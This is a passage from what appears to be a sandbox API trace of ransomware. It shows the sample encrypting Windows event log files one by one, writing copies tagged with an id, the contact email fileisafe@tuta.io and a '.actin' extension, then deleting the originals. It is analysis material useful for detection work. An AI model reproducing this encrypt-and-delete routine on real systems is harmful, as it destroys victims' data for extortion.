CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.985] ReadFile (in: hFile=0x344, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.987] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.987] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.989] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b00) returned 1 [0062.989] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.989] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0062.989] CryptDestroyKey (hKey=0xf71b00) returned 1 [0062.989] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0062.989] CryptDestroyKey (hKey=0xf71b80) returned 1 [0062.989] CloseHandle (hObject=0x344) returned 1 [0062.990] CloseHandle (hObject=0x2e4) returned 1 [0062.992] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx")) returned 1 [0062.993] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.993] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0062.993] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.994] CloseHandle (hObject=0x2e4) returned 1 [0062.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx")) returned 0x20 [0062.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.994] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0062.994] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.994] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.994] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.996] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b80) returned 1 [0062.996] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.996] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.998] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.998] WriteFile (in: hFile=0x344, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0063.000] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72180) returned 1 [0063.000] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.000] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0063.000] CryptDestroyKey (hKey=0xf72180) returned 1 [0063.000] WriteFile (in: hFile=0x344, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0063.000] CryptDestroyKey (hKey=0xf71b80) returned 1 [0063.000] CloseHandle (hObject=0x2e4) returned 1 [0063.000] CloseHandle (hObject=0x344) returned 1 [0063.002] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx")) returned 1 [0063.004] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0063.004] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.004] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0063.004] CloseHandle (hObject=0x344) returned 1 [0063.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx")) returned 0x20 [0063.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.004] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.005] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.005] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.005] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0063.005] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0063.005] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.005] ReadFile (in: hFile=0x344, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0063.007] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0063.007] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0063.009] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e80) returned 1 [0063.009] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.009] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0063.009] CryptDestroyKey (hKey=0xf71e80) returned 1 [0063.009] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0063.009] CryptDestroyKey (hKey=0xf71b00) returned 1 [0063.009] CloseHandle (hObject=0x344) returned 1 [0063.009] CloseHandle (hObject=0x2e4) returned 1 [0063.011] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx")) returned 1 [0063.012] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0063.012] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.188] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0063.197] CloseHandle (hObject=0x344) returned 1 [0063.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx")) returned 0x20 [0063.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.197] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.197] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.197] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.197] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.197] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0063.197] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.197] ReadFile (in: hFile=0x344, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0063.199] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0063.199] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0063.201] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71cc0) returned 1 [0063.201] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.201] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0063.201] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0063.201] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0063.201] CryptDestroyKey (hKey=0xf71b00) returned 1 [0063.201] CloseHandle (hObject=0x344) returned 1 [0063.201] CloseHandle (hObject=0x338) returned 1 [0063.203] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx")) returned 1 [0063.204] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0063.204] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.205] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0063.205] CloseHandle (hObject=0x338) returned 1 [0063.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx")) returned 0x20 [0063.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.205] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.205] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.205] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.205] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.206] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71dc0) returned 1 [0063.206] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.206] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0063.207] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0063.208] WriteFile (in: hFile=0x344, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0063.209] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71ec0) returned 1 [0063.209] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.209] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0063.209] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0063.209] WriteFile (in: hFile=0x344, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0063.210] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0063.210] CloseHandle (hObject=0x338) returned 1 [0063.210] CloseHandle (hObject=0x344) returned 1 [0063.211] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx")) returned 1 [0063.213] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0063.213] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.213] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0063.213] CloseHandle (hObject=0x344) returned 1 [0063.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx")) returned 0x20 [0063.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.213] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.213] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.213] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.213] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.214] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71cc0) returned 1 [0063.214] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.214] ReadFile (in: hFile=0x344, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0063.215] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0063.215] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0063.220] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b80) returned 1 [0063.220] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0063.220] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0063.220] CryptDestroyKey (hKey=0xf71b80) returned 1 [0063.220] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0063.220] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0063.220] CloseHandle (hObject=0x344) returned 1 [0063.220] CloseHandle (hObject=0x338) returned 1 [0063.224] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx")) returned 1 [0063.227] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0063.227] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.227] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0063.228] CloseHandle (hObject=0x338) returned 1 [0063.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx")) returned 0x20 [0063.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.228] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.229] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0063.229] SetFilePointerEx (in: hFile=0x338, 